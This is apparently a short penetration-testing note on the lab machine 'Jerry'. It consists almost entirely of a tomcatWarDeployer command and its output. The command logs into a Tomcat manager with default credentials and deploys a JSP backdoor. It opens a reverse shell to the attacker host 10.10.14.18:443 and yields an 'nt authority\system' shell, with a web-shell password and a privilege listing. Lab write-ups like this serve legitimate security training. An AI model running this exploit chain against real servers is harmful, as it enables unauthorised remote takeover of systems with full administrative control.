3 tomcatWarDeployer

Last updated 3 years ago

$ python tomcatWarDeployer.py -U tomcat -P s3cret -H 10.10.14.18 -p 443 10.10.10.95:8080/manager/html/ -x tomcatWarDeployer (v. 0.5.2) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18 Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured. INFO: Reverse shell will connect to: 10.10.14.18:443. INFO: Apache Tomcat/7.0.88 Manager Application reached & validated. INFO: At: "http://10.10.10.95:8080/manager/html/" WARNING: Application with name: "jsp_app" is already deployed. INFO: WAR DEPLOYED! Invoking it... INFO: ------------------------------------------------------------ INFO: JSP Backdoor up & running on http://10.10.10.95:8080/jsp_app/ INFO: Happy pwning. Here take that password for web shell: 'O8lGxv8goxey' INFO: ------------------------------------------------------------ INFO: Connected with: nt authority\system@JERRY C:\apache-tomcat-7.0.88> whoami nt authority\system C:\apache-tomcat-7.0.88> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State =============================== ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeLockMemoryPrivilege Lock pages in memory Enabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeTcbPrivilege Act as part of the operating system Enabled SeSecurityPrivilege Manage auditing and security log Disabled SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled SeLoadDriverPrivilege Load and unload device drivers Disabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Disabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeCreatePermanentPrivilege Create permanent shared objects Enabled SeBackupPrivilege Back up files and directories Disabled SeRestorePrivilege Restore files and directories Disabled SeShutdownPrivilege Shut down the system Disabled SeDebugPrivilege Debug programs Enabled SeAuditPrivilege Generate security audits Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeManageVolumePrivilege Perform volume maintenance tasks Disabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled